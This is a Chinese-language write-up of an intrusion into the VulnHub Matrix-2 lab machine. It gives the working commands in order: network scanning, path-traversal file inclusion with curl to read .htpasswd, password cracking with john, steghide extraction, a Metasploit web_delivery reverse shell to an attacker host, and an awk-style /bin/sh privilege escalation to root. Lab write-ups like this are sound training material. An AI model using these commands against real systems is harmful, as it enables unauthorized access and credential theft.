vulnhub之Matrix-2的实践

admin 2024年12月2日10:59:00评论5 views字数 1314阅读4分22秒阅读模式

本周实践的是vulnhub的Matrix-2镜像,

下载地址,https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址是192.168.0.187,

vulnhub之Matrix-2的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,

发现靶机开了1337、12320、12322端口的https服务,

vulnhub之Matrix-2的实践

浏览器访问https://192.168.0.187:1337,需要登录,

vulnhub之Matrix-2的实践

浏览器访问https://192.168.0.187:12320,是web命令行,

vulnhub之Matrix-2的实践

由于之前12322端口的https服务扫描到file_view.php路径,

尝试文件包含漏洞,成功,发现了n30账户,

vulnhub之Matrix-2的实践

继续文件包含,curl -X POST -k https://192.168.0.187:12322/file_view.php -d "file=../../../../../etc/nginx/sites-available/default"

获取到/var/www/p4ss/.htpasswd,

vulnhub之Matrix-2的实践

再继续文件包含,curl -X POST -k https://192.168.0.187:12322/file_view.php -d "file=../../../../../var/www/p4ss/.htpasswd",

获取到Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0,

vulnhub之Matrix-2的实践

保存到文件,vim hash,

暴破,john hash --wordlist=/usr/share/wordlists/rockyou.txt,

获取到Tr1n17y/admin,

vulnhub之Matrix-2的实践

登录https://192.168.0.187:1337,页面源码中获取到n30账户的密码隐藏在图片h1dd3n.jpg中,

vulnhub之Matrix-2的实践

下载图片,curl -u Tr1n17y:admin -k https://192.168.0.187:1337/h1dd3n.jpg -o h1dd3n.jpg,

并破解,steghide extract -sf h1dd3n.jpg -p n30,

获取到密码,cat n30.txt,P4$$w0rd,

登录https://192.168.0.187:12320成功,

vulnhub之Matrix-2的实践

上msf,

use exploit/multi/script/web_delivery

set SRVHOST 192.168.0.190

set LHOST 192.168.0.190

exploit

去web命令行执行,获取到反弹shell,sessions 1,

vulnhub之Matrix-2的实践

查看到能提权的历史命令,

ls,cat .bash_history,

morpheus 'BEGIN {system("/bin/sh")}',

vulnhub之Matrix-2的实践

进入普通shell,执行提权命令,

morpheus 'BEGIN {system("/bin/sh")}',

获取到新的shell,id确认是root权限,

vulnhub之Matrix-2的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Matrix-2的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月2日10:59:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Matrix-2的实践https://cn-sec.com/archives/3457589.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息